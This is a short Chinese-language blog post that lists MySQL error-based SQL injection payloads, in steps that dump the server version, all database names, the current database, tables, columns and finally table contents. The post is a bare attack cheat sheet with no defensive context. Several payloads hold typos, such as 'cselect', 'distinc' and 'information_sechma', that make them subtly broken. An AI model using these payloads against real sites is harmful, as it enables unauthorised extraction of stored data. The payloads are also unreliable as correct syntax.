A-A+

MYSQL高级报错注入脚本安全

2016年03月07日 22:00 汪洋大海 暂无评论 阅读 503 views 次

 MYSQL高级报错注入

    and (select count(*) from mysql.user)>0/*

    1、查看MYSQL版本

    and+exists(select*from+(select*from(select+name_const(@@version,0))a+join(select+name_const(@@version,0))b)c)

    2、爆所有库

    and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,schema_name,0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

    3、爆当前数据库

    and(select 1 from(select count(*),concat((select cselect concat(0x7e,0x27,hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

    4、爆表

    and(select 1 from(select count(*),concat((select (select (select distinc concat(0x7e,0x27,hex(cast(table_name as char)),0x27,0x7e) from information_schema.tables where table_schema=hex库名 limit 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

    5、爆字段

    and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,column_name,0x27,0x7e) from information_sechma.columns where table_schema=库名 and table_name=表名 limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

    6、爆内容

    and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,表名.字段,0x27,0x7e) from 表名 limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

标签:

给我留言